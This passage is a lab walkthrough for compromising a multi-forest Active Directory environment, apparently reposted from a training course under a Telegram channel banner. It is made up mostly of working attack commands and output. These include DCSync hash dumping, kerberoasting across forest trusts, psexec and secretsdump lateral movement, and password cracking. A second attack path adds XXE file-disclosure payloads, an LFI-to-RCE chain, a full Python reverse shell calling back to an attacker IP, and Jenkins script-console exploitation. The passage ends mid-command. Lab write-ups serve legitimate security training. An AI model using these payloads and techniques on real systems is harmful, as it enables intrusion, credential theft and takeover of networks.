"Get-Replication-Changes-All" rights over domain
object.

# meterpreter session
load kiwi
kiwi_cmd \"lsadump::dcsync /user:els\\krbtgt\"
<Result> NTLM:a8a94897fbb33ed8925f17ba7ccdff67
</Result>

kiwi_cmd \"lsadump::dcsync /user:els\\els-admin\"

<Result> NTLM: 8645e87e2593507cf623f3291b1334c2
</Result>
3. ELS-DC Server

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

With access to "els-admin" domain admin at ELS-DC

server, we can maintain a stable persistent
shell.

Use Metasploit's windows/smb/psexec module to

establish a connection with the target machine.

# Meterpreter
use exploit windows/smb/psexec
set rhosts 10.10.1.3
set SMBDOMAIN els.corp
set SMBUSER els-admin
set SMBPASS 8645e87e2593507cf623f3291b1334c2
set payload windows/x64/meterpreter/bind_tcp

Using PowerView
(https://github.com/PowerShellMafia/PowerSploit/b
lob/dev/Recon/PowerView.ps1), we will enumerate
any misconfigurations that we can find to abuse
the cross-forest trust established between
"ELS.CORP" and "MGMT.CORP".

With the following query, we will enumerate named

services across the forest trust. It is possible
to perform kerberoasting across forest trusts,
all we need is the TGS of a named account with
SPN.

Import-Module PowerView_dev.ps1
Get-NetDomainTrust | ?{$_.TrustType -ne
'External'} | %{Get-NetUser -SPN -Domain
$_.TargetName}

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

<..SNIP..>
distinguishedname ∶
CN=spn_svc,OU=SPN_Service,DC=mgmt,DC=corp
displayname ∶ spn_svc
userprincipalname ∶ spn_svc@mgmt.corp
name ∶ spn_svc
serviceprincipalname ∶
{http/mgmt-dc.mgmt.corp,http/mgmt-dc}
objectsid ∶
S-1-5-21-3658202825-2428483480-107650130-1106
samaccountname ∶ spn_svc

<../SNIP..>

# Alternatively you can use

PS > Get-ADTrust -Filter *
<../SNIP..>
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName :
CN=mgmt.corp,CN=System,DC=els,DC=corp
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : mgmt.corp
ObjectClass : trustedDomain
ObjectGUID :
8e516577-4290-486d-bfcf-7a704a5eb26e
SelectiveAuthentication : False
SIDFilteringForestAware : False

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

SIDFilteringQuarantined : False
Source : DC=els,DC=corp
Target : mgmt.corp
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
<../SNIP..>
PS > setspn.exe -T mgmt.corp -Q */*
setspn.exe -T mgmt.corp -Q */*
Checking domain DC=mgmt,DC=corp
CN=MGMT-DC,OU=Domain Controllers,DC=mgmt,DC=corp

Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/MGMT-DC
.mgmt.corp

ldap/MGMT-DC.mgmt.corp/ForestDnsZones.mgmt.corp

ldap/MGMT-DC.mgmt.corp/DomainDnsZones.mgmt.corp
TERMSRV/MGMT-DC
TERMSRV/MGMT-DC.mgmt.corp
DNS/MGMT-DC.mgmt.corp
GC/MGMT-DC.mgmt.corp/mgmt.corp
RestrictedKrbHost/MGMT-DC.mgmt.corp
RestrictedKrbHost/MGMT-DC

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

RPC/c8ffb42a-a59c-41f0-a5a0-e833cfc0c4b6._msdcs.m
gmt.corp
HOST/MGMT-DC/MGMT
HOST/MGMT-DC.mgmt.corp/MGMT
HOST/MGMT-DC
HOST/MGMT-DC.mgmt.corp
HOST/MGMT-DC.mgmt.corp/mgmt.corp

E3514235-4B06-11D1-AB04-00C04FC2DCD2/c8ffb42a-a59
c-41f0-a5a0-e833cfc0c4b6/mgmt.corp
ldap/MGMT-DC/MGMT

ldap/c8ffb42a-a59c-41f0-a5a0-e833cfc0c4b6._msdcs.
mgmt.corp
ldap/MGMT-DC.mgmt.corp/MGMT
ldap/MGMT-DC
ldap/MGMT-DC.mgmt.corp
ldap/MGMT-DC.mgmt.corp/mgmt.corp
CN=krbtgt,CN=Users,DC=mgmt,DC=corp
kadmin/changepw
CN=spn_svc,OU=SPN_Service,DC=mgmt,DC=corp
http/mgmt-dc.mgmt.corp
http/mgmt-dc

It can be clearly seen that a domain user of the

MGMT domain "spn_svc" has an SPN set, it is
possible to retrieve the service ticket hash, as
follows:

# PowerShell using PowerView Dev

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

PS > Request-SPNTicket -SPN

http/mgmt-dc.mgmt.corp -verbose
# Meterpreter
upload Rubeus.exe .
execute -f Rubeus.exe -a "kerberoast
/domain:mgmt.corp" -i -c
<....>
[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName : spn_svc

[*] DistinguishedName :
CN=spn_svc,OU=SPN_Service,DC=mgmt,DC=corp
[*] ServicePrincipalName :
http/mgmt-dc.mgmt.corp
[*] PwdLastSet : 6/11/2020 10:43:32
AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash :
$krb5tgs$23$*spn_svc$mgmt.corp$http/mgmt-dc.mgmt.
corp@mgmt.corp*$DFB7897AD450A16168DB84CE775955E9$
60C255890C3DC5C944D26DC6C1477F8BBAD942B706DCD3AB8
32947D4580FEB...
<....>

The service account credentials ('spn_svc') are

extracted using a brute-forcing technique.

Credentials: "spn_svc:B@DB!tch"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The Domain user "spn_svc" of "MGMT.corp" is also

a member of the administrator's group in the
MGMT-DC domain controller.

The IP address of MGMT-DC can be found using a

simple ping command or a nslookup DNS query
[10.10.3.2]
4. MGMT-DC Server

On the current meterpreter session add a route to

the "10.10.3.0.24" network and then start a socks
server to access MGMT-DC.mgmt.corp.

Perform the following actions to establish a

persistent shell on MGMT-DC server.

# Metasploit
route add 10.10.3.0/24 <session_id>
use auxiliary/server/socks4a
run -j
# Attackers machine
# Make sure /etc/proxychains.conf has configured
# socks4 127.0.0.1 1080
# Add to host file /etc/hosts
# 10.10.3.2 MGMT-DC.MGMT.CORP

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now get access to "MGMT-DC.mgmt.corp" leveraging

impacket's psexec.py script.

proxychains psexec.py
spn_svc:'B@DB!tch'@10.10.3.2

We will use the Active Directory Module present

in the server to list the OU present in the
MGMT-DC and all the members present in the
available OU's.

# LIST all OU’s in MGMT.CORP

Import-Module ActiveDirectory
Get-ADObject -Filter {ObjectClass -eq
'organizationalunit'} -Properties CanonicalName |
Select-Object DistinguishedName
# Get Members of “Bastion-Host” OU
$oupath = "OU=Bastion-Host,DC=mgmt,DC=corp"
Get-ADUser -Filter * -SearchBase $oupath

The Domain user "Jump-Admin" present in the

"Bastion-Host" OU can be useful in moving forward
from the MGMT-DC server. The IP address of
"jump-srv" server can be enumerated by actively
querying the DNS record.

nslookup jump-srv
Name: jump-srv.mgmt.corp
Address: 10.10.3.3

However, we will extract all the credentials

present in the MGMT.CORP domain leveraging
impacket's sercretsdump.py script.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

On a new bash prompt using our route to the

internal network [10.10.3.0/24], we will execute
secretsdump.py as follows:

proxychains secretsdump.py
spn_svc:'B@DB!tch'@10.10.3.2

Crack the "jump-admin" hash using JTR [John] by

storing the NT hash in a file.

The hash is cracked and we now have clear text

credentials of the "jump-admin" user at the
"Jump-Admin" machine.

john --format=NT jump-adminpass.txt

-w=/usr/share/wordlists/rockyou.txt

We will now perform port scanning against the

newly discovered IP address.
5. Jump-Srv

Let's perform a TCP port scan against the target

10.10.3.3 [jump-srv.mgmt.corp] using nmap and
leveraging the route to the 10.10.3.0/24 network.

# Using meterpreter’s active route to

“10.10.3.0/24” network on new bash shell

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

proxychains nmap --top-ports 10 -sT -sV -Pn

10.10.3.3
<..SNIP..>

Nmap scan report for 10.10.3.3

Host is up (2.4s latency).

PORT STATE SERVICE VERSION

21/tcp closed ftp
22/tcp open ssh OpenSSH 7.2p2
Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
23/tcp closed telnet
25/tcp closed smtp
80/tcp closed http
110/tcp closed pop3

<..SNIP..>

SSH server is running on TCP port 22. As

'jump-srv.mgmt.corp' machine is managed by
"jump-admin", we can try to do SSH to '10.10.3.3'
machine using Jump-Admin Domain user.

We successfully SSHed to Jump-SRV.mgmt.corp as

the "jump-admin" domain user. (Using the
jump-admin cracked password ‘B@DB!tch’)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's also extract the bookmark URLs of Firefox

in this machine and look if any interesting
information can be found (as jump-admin user).

# As ‘Jump-admin’ domain user

cd ~/.mozilla/firefox/2s3p6m1v.default-release
sqlite3 places.sqlite
# Inside SQLite
.tables
select moz_places.url from moz_places;
.quit
found URL:
https://admin-sys.site/login.asp?user=sys-admin&p
ass=Rand0mlyS3l3ctedP@ss

However, using Firefox with proxychains to query

the login URL shows that it is non-existent. Now
enumerate the IP address of the admin-sys server
by pinging the URL.

ping admin-sys.site -c 1

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

PING admin-sys.site (192.168.1.2) 56(84) bytes of

data.

--- admin-sys.site ping statistics ---

1 packets transmitted, 0 received, 100% packet
loss, time 0ms

Performing a TCP port scan against the

"192.168.1.2" target reveals that the 5985 port
is open, which means one can always do PowerShell
Remoting.

6. Admin-SYS

In order to perform PowerShell Remoting, we need

to apply some port forwarding techniques.

Exit the SSH session and re-establish a new

session with port forwarding switches.

Using port forwarding, we are specifying that all

the traffic sent locally will be forwarded to the
'admin-sys' server [192.168.1.2]

On a new bash session

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑠𝑠ℎ −𝑙 𝑗𝑢𝑚𝑝−𝑎𝑑𝑚𝑖𝑛@𝑀𝐺𝑀𝑇.𝐶𝑂𝑅𝑃 10.10.3.3 −𝐿
5985:192.168.1.2:5985
(Now at this very particular point, traffic from
your attacker machine can reach the admin-sys
machine)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Use Evil-WinRM to connect to 192.168.1.2 machine

with the discovered credentials
./𝑒𝑣𝑖𝑙−𝑤𝑖𝑛𝑟𝑚.𝑟𝑏 −𝑖 127.0.0.1 −𝑢 𝑠𝑦𝑠−𝑎𝑑𝑚𝑖𝑛 −𝑝
𝑅𝑎𝑛𝑑0𝑚𝑙𝑦𝑆3𝑙3𝑐𝑡𝑒𝑑𝑃@𝑠𝑠

Enumerating the environment reveals that

"sys-admin" is a local user at the admin-sys
server. Privilege escalation can be done by
querying the autologin registry.

Clear Text credentials of Administrator are

found, as follows..

# On the recently established WinRM session

reg query "HKLM\SOFTWARE\Microsoft\Windows

NT\Currentversion\Winlogon"

<..SNIP..>

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultUserName REG_SZ Administrator

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

DefaultDomainName REG_SZ WIN-10-PRO-X64

AutoAdminLogon REG_SZ 1
DefaultPassword REG_SZ Test@123

<..SNIP..>

Reconnect to the 'admin-sys' server with local

administrator credentials.

./evil-winrm.rb -i 127.0.0.1 -u Administrator -p

Test@123

type C:\Users\Administrator\Desktop\Triumph.txt

<Result>

CONGRATULATIONS, YOU HAVE SUCCESSFULLY

COMPROMISED MULTI-FOREST RED TEAM ENVIRONMENT!!

<3

</Result>

Congratulations!!

The Multi-Forest Red Team Environment is

successfully compromised.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

—------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
----------—--------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
------------------------------

Red-teaming Active Directory Lab

#3 (ELS.CORP) (Attack Path 2)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://my.ine.com/CyberSecurity/courses/9328123b/penet
ration-testing-red-teaming-active-directory/lab/57ee869
4-facd-4535-b6c8-b4595d18ecb7

Contents
Web Server Attack Path (Path 2)

1. Prod-SRV . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . .

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

2. OPS-SRV . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . .

3. ELS-CHILDDC . . . . . . . . . . . . . . . .
. . . . . . . . . . . .

4. ELS-DC . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . .

5. MGMT-DC . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . .

6. JUMP-SRV . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . .

7. Admin-SYS . . . . . . . . . . . . . . . . .
. . . . . . . . . . . .

Scenario
You have been asked to execute a (black-box) red
teaming exercise against eLS Corp (including any
related/trusted forest). The letter of engagement
has specified:

1. The ADMIN-SYS system as the crown jewel.

This means that the ultimate goal of this red
teaming exercise is to obtain access to the
ADMIN-SYS system.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

2. That during this exercise, the web

application hosted on 172.16.250.2 is
included in the scope and you can exploit it
to gain initial foothold

3. The mail server hosted on 172.16.250.2 is

out of scope and should not be touched

4. That the pentesters' network range is

172.16.25.0/24 and a static route has been
configured so that pentesters can access the
172.16.250.0/24 network range, where eLS Corp
assets exist

5. For any cracking activities use the

/usr/share/wordlists/rockyou.txt wordlist,
included in latest Kali's

Hints
Refer to the attack path diagram of page 1 only
when you are out of options.

1. Prod-SRV Server

Scanning the accessible IP range from the scope

of engagement provides us with two possible entry
points both residing on the "172.16.250.2" IP.
Specifically, scanning the TCP ports of
172.16.250.2 tells us that an SMTP server and a
web application are running on TCP ports 25 and

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

80. According to the letter of engagement, the

SMTP server is out of scope.

Accessing port 80 through a web browser reveals

that a web service is running with a
login/registration

functionality.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Registering and checking the request and response

from the portal suggests that XML technology is
used to transfer information from the client to
the server. Let's check if the portal is
vulnerable to XML External Entity (XXE) attacks.

Using the following XXE payload after capturing

the request in the web portal leads to internal
file disclosure.

<?xml version="1.0" encoding="UTF−8"?>

<!DOCTYPE abc [
<!ENTITY ab SYSTEM "file:///etc/passwd">
]>

<root><name>&ab;</name><tel>11111111</tel><email>
yb@sq.co</email><password>12345</password></root>

Through internal file disclosing, sensitive

information can easily be obtained (through the

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

XXE vulnerability). For now, we will look for the

"/etc/passwd" file.

A local user named "prod-admin" is clearly

visible in the "/etc/passwd" file, let's
enumerate more to see if we can gain some more
information about the discovered user.

Looking at the ".bash_history" file of the

"prod-admin" user, another internal file is
disclosed which cannot be obtained via directory
brute-forcing.

<?xml version="1.0" encoding="UTF−8"?>

<!DOCTYPE abc [
<!ENTITY ab SYSTEM
"file:///home/prod-admin/.bash_history">
]>

<root><name>&ab;</name><tel>11111111</tel><email>
yb@sq.co</email><password>12345</password></root>

The interesting internal files disclosed are

located at '/var/www/html/Lab-User.php' and
'/var/www/Lab-Admin.php'.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

However, we cannot read the files directly, we

will use php filter as our workaround to disclose
file contents in base64 format and then convert
it to a readable format.

The content of the "/var/www/html/Lab-User.php"

file can be viewed, as follows:

Copy the Base64 string from the response body of

Burp Suite and then use the following command to
read the contents in a readable format.

From the file "/var/www/html/Lab-User.php" an

input parameter "page" is disclosed which can be
used to include files as parameters in the URL.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Similarly, the content of the

"/var/www/Lab-Admin.php" file can also be viewed
using the PHP filter.

A URL parameter 'cmd' is disclosed for command

execution inside 'Lab-Admin.php'

This means that the file "Lab-User.php" can be

used to include another file and the
"Lab-Admin.php" file can be used to execute
commands.

Command execution can be achieved, as follows.

We have successfully exploited the portal through

the below vulnerability chain:

"XXE → LFI → RCE"

Next step would be to establish a stable reverse

shell leveraging RCE for initial access. Use the
following command to get a reverse shell from the
"Prod-SRV" server.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

http://172.16.250.2/Lab-User.php?page=../Lab-Admi
n.php&cmd=python -c import
socket,subprocess,os;s=socket.socket(socket.AF_IN
ET,socket.SOCK_STREAM);s.connect(("172.16.25.x",4
444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1)
;os.dup2(s.fileno(),2);p=subprocess.call(["/bin/s
h","-i"]);

We will be using Metasploit "multi/handler"

module to receive the reverse shell.

use exploit/multi/handler
set payload cmd/unix/reverse_python
set LHOST <attacking_IP>
set LPORT <listening_port>
run -j

Reverse shell of Prod-SRV server.

Neat! We have a shell with 'www-data' privileges.

Upgrade the session to stable meterpreter
session.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

For privilege escalation, "www-data" user can

execute "sudo" with "vi" as prod-admin user, this
can be checked & abused as follows:

𝑠ℎ𝑒𝑙𝑙
𝑝𝑦𝑡ℎ𝑜𝑛 −𝑐 “𝑖𝑚𝑝𝑜𝑟𝑡 𝑝𝑡𝑦;𝑝𝑡𝑦.𝑠𝑝𝑎𝑤𝑛(‘/𝑏𝑖𝑛/𝑏𝑎𝑠ℎ’);”
𝑠𝑢𝑑𝑜 −𝑙

<𝑅𝑒𝑠𝑢𝑙𝑡>
𝑈𝑠𝑒𝑟 𝑤𝑤𝑤−𝑑𝑎𝑡𝑎 𝑚𝑎𝑦 𝑟𝑢𝑛 𝑡ℎ𝑒 𝑓𝑜𝑙𝑙𝑜𝑤𝑖𝑛𝑔 𝑐𝑜𝑚𝑚𝑎𝑛𝑑𝑠 𝑜𝑛 𝑃𝑟𝑜𝑑−𝑆𝑟𝑣:
(𝒑𝒓𝒐𝒅−𝒂𝒅𝒎𝒊𝒏) /𝒖𝒔𝒓/𝒃𝒊𝒏/𝒗𝒊, 𝑵𝑶𝑷𝑨𝑺𝑺𝑾𝑫:𝑨𝑳𝑳
</𝑅𝑒𝑠𝑢𝑙𝑡>

𝑠𝑢𝑑𝑜 −𝑢 𝑝𝑟𝑜𝑑−𝑎𝑑𝑚𝑖𝑛 𝑣𝑖
𝑃𝑟𝑒𝑠𝑠 “𝑬𝑺𝑪 +∶ ”
!/𝑏𝑖𝑛/𝑠ℎ
𝑏𝑎𝑠ℎ −𝑖
𝑤ℎ𝑜𝑎𝑚𝑖

<𝑅𝑒𝑠𝑢𝑙𝑡>
𝑷𝒓𝒐𝒅−𝒂𝒅𝒎𝒊𝒏
</𝑅𝑒𝑠𝑢𝑙𝑡>

Escalated to "prod-admin" user.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

However, to move forward we need an internal IP

address. Interestingly enough, this machine does
not have another interface. If you recall, during
enumeration we found that the ".bash_history" of
the prod-admin user contains links to some log
files.

The "10.10.2.4" IP address can be spotted on the

"/var/log/auth.log" file.

Note: if the log is filled, it is automatically

shifted to "/var/log/auth.log.1" or
'/var/log/auth.log.2' and so on, check this too
if the IP address is not found.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

With the discovered "10.10.2.4" IP address we

will add a route to the "10.10.2.0/24" network
and start a socks server.

On meterpreter prompt

𝑟𝑜𝑢𝑡𝑒 𝑎𝑑𝑑 10.10.2.0/24 <𝑠𝑒𝑠𝑠𝑖𝑜𝑛_𝐼𝐷>

𝑟𝑜𝑢𝑡𝑒

Start SOCKS server

𝑢𝑠𝑒 𝑎𝑢𝑥𝑖𝑙𝑖𝑎𝑟𝑦/𝑠𝑒𝑟𝑣𝑒𝑟/𝑠𝑜𝑐𝑘𝑠4𝑎
𝑠ℎ𝑜𝑤 𝑜𝑝𝑡𝑖𝑜𝑛𝑠
𝑠𝑒𝑡 𝑆𝑅𝑉𝐻𝑂𝑆𝑇 172.16.25.𝑥
𝑠𝑒𝑡 𝑆𝑅𝑉𝑃𝑂𝑅𝑇 <𝑙𝑖𝑠𝑡𝑒𝑛𝑖𝑛𝑔_𝑝𝑜𝑟𝑡>
𝑟𝑢𝑛 −𝑗

Modify /etc/proxychains.conf
𝑠𝑜𝑐𝑘𝑠4𝑎 172.16.25.𝑥 1080

Now, we will scan the TCP ports of the discovered

IP address "10.10.2.4".

1. OPS-SRV Server

Leveraging the route to the "10.10.2.0/24"

network and scanning TCP ports using proxychains
reveals that a web server is running on 8080.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Open Firefox (or any web browser) with

proxychains and point the browser to port 8080 of
10.10.2.4

URL: http://10.10.2.4:8080

A Jenkins server is running with guessable

credentials. Specifically, "admin/admin" is a
valid set of username/password.

After authentication, it is found that the

'admin' user has view-only rights. Browsing
straight to the credentials store, clear text
credentials of "Jenkins-admin" can be been found.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Browse to:
http://10.10.2.4:8080

Authenticate with:
𝑎𝑑𝑚𝑖𝑛/𝑎𝑑𝑚𝑖𝑛

Head straight to the credentials store, the

following credentials were found:
𝑗𝑒𝑛𝑘𝑖𝑛𝑠−𝑎𝑑𝑚𝑖𝑛\𝐴𝑑𝑚!𝑛@𝐽3𝑛𝑘!𝑛𝑠

Logout and login again as "jenkins-admin" using

the identified credentials.

We can establish a shell with the "ops-srv"

machine by building and executing a malicious
task. In order to do so we will use Metasploit's
"jenkins_script_console" module.

Configure Exploit:
𝑢𝑠𝑒 𝑒𝑥𝑝𝑙𝑜𝑖𝑡/𝑚𝑢𝑙𝑡𝑖/ℎ𝑡𝑡𝑝/𝑗𝑒𝑛𝑘𝑖𝑛𝑠_𝑠𝑐𝑟𝑖𝑝𝑡_𝑐𝑜𝑛𝑠𝑜𝑙𝑒
𝑠𝑒𝑡 𝑡𝑎𝑟𝑔𝑒𝑡 1
𝑠𝑒𝑡 𝑇𝐴𝑅𝐺𝐸𝑇𝑈𝑅𝐼 /
𝑠𝑒𝑡 𝑅𝑃𝑂𝑅𝑇 8080

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

𝑠𝑒𝑡 𝑈𝑆𝐸𝑅𝑁𝐴𝑀𝐸 𝑗𝑒𝑛𝑘𝑖𝑛𝑠−𝑎𝑑𝑚𝑖𝑛

